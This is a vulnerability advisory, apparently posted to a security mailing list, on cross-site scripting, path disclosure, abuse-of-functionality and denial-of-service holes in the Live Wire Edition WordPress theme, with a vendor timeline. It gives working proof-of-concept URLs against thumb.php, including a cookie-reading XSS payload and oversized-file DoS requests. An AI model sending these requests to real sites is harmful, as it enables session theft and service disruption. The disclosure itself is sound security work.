Hello list! I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in Live Wire Edition theme for WordPress. It's commercial theme for WP by WooThemes. ------------------------- Affected products: ------------------------- Vulnerable are Live Wire Edition 2.3.1 and previous versions. XSS is possible only in old versions of the theme. Recently in version Live Wire Edition 2.4 most of these vulnerabilities were fixed (but there were still left many not fixed FPD). ---------- Details: ---------- XSS (WASC-08): http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111 http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1 http://site/wp-content/themes/livewire-edition/ And also other 30 php-scripts of the theme in folder /livewire-edition/ and all subfolders. Abuse of Functionality (WASC-42): http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1 DoS (WASC-10): http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1 About such AoF and DoS vulnerabilities I wrote in article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). Beside folder /livewire-edition/, this theme also can be placed in folder /livewire-package/ (which includes all three themes of Live Wire series). ------------ Timeline: ------------ 2011.02.01 - announced at my site. 2011.02.01 - informed developers. 2011.02.04-12 - conversation about fixing holes in all their themes for WordPress. At first they tried to fix all these holes in themes at their own sites. 2011.03.28 - developers released version 2.4. 2011.04.08 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4893/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua